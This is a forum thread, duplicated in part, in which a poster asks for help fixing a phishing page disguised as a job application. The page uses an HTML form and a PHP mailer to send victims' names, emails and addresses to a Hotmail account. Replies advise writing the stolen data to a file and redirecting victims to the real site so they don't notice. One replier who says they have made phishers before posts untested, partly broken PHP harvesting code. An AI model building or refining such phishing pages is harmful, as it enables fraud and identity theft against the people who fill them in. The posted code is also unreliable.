OK, so my friend has a phishing page, except it looks like a job application, and he is trying to design it to collect personal information.
He has successfully integrated his HTML FORM with his SENDMAIL.PHP file to send information from the form to his email.
But he is having a hard time with one problem:
He can't get ALL the data from the form to the email. Usually, only one field shows up in the email.
He has spent hours searching and using deductive resoning trying to figure out the syntax, but still no avail.
Can you help him please?

Here's a SHORTENED version of the HTML FORM, and also the full PHP code:

form action="sendmail.php" method="post" >
<tr>
<td>Full Name </td>
<td><input size="40" name="name1"> </td></tr>
<tr>
<td>Email Address </td>
<td><input size="30" name="email1"> </td></tr>
<tr>
<td>Street Address </td>
<td><input size="40" name="address1"> </td></tr>
<input type="submit" name="Submit" value="Submit Query">

PHP CODE (saved as sendmail.php):



<?php
$email=$_REQUEST['email1'];
$message=$_REQUEST['name1'];

mail("MYFRIENDSEMAIL@HOTMAIL.COM","Subject: $email", $message);
echo "Thank you for filling out your application<br>
You should receive an email from our employment representative shortly";
?>

Again, there are several more fields on the application, i've just shortened it down so it's easier to understand.

OK, so my friend has a phishing page, except it looks like a job application, and he is trying to design it to collect personal information.
He has successfully integrated his HTML FORM with his SENDMAIL.PHP file to send information from the form to his email.
But he is having a hard time with one problem:
He can't get ALL the data from the form to the email. Usually, only one field shows up in the email.
He has spent hours searching and using deductive resoning trying to figure out the syntax, but still no avail.
Can you help him please?

Here's a SHORTENED version of the HTML FORM, and also the full PHP code:

form action="sendmail.php" method="post" >
<tr>
<td>Full Name </td>
<td><input size="40" name="name1"> </td></tr>
<tr>
<td>Email Address </td>
<td><input size="30" name="email1"> </td></tr>
<tr>
<td>Street Address </td>
<td><input size="40" name="address1"> </td></tr>
<input type="submit" name="Submit" value="Submit Query">PHP CODE (saved as sendmail.php):



<?php
$email=$_REQUEST['email1'];
$message=$_REQUEST['name1'];

mail("MYFRIENDSEMAIL@HOTMAIL.COM","Subject: $email", $message);
echo "Thank you for filling out your application<br>
You should receive an email from our employment representative shortly";
?>Again, there are several more fields on the application, i've just shortened it down so it's easier to understand.
A few things I'd do: A, write the information to a file, not email. It's so much more efficient that way, it takes less time (not having to use the mail server etc), and get all of your variables together and make them into one variable, like:

$whole = "$field1 - $field2 - $field3<br />\n"; and use that one variable to store the information rather than dragging all the other variables out. Without seeing the full code though it's a tough call.

Post the full script and I will fix it.

Need to set id="name1/ email" instead of name, in your HTML.

And also use $_POST[''] to get the variables, instead of $_REQUEST['']

Have fun, skiddy.

Like a few people has said, you should be using $_POST, not request. Also as Clover suggested, I would write the info to a file instead of email. I'll write up some code, I've made phishers before.

Note to consider:
After they submit the form, send them to the correct page. They will just think they entered their password incorrectly.

EDIT:
Ok, just made this, haven't tested it as I don't have a PHP server, so it's most likely to be a bit sketchy, but here it is.


<?php

if(isset($_POST['submit'])) {

$firstname = $_POST['firstname'];
$surname = $_POST['surname'];
$email = $_POST['email'];

//Write to file method one:
$filename_to_write = "Data_" . $_POST->id . ".php";

//Write to file method two:
fwrite($_POST,'FileName');

//If FORM has already been submitted, then:
//send them to the correct website
//so they don't notice what happened.
//can't remember the code for that right now though

} else {
?>

<!--self referencing form, just for testing, remove when neccessary-->

<form name="input" action="<?php echo $_SERVER['PHP_SELF'];?>" method="POST" onSubmit="">

<pre>

First Name: <input type=text name="firstname" size="15">

Surname: <input type=text name="surname" size="15">

E-mail: <input type="text" name="email" size="30">
</pre>
</form>

<?php
}
?>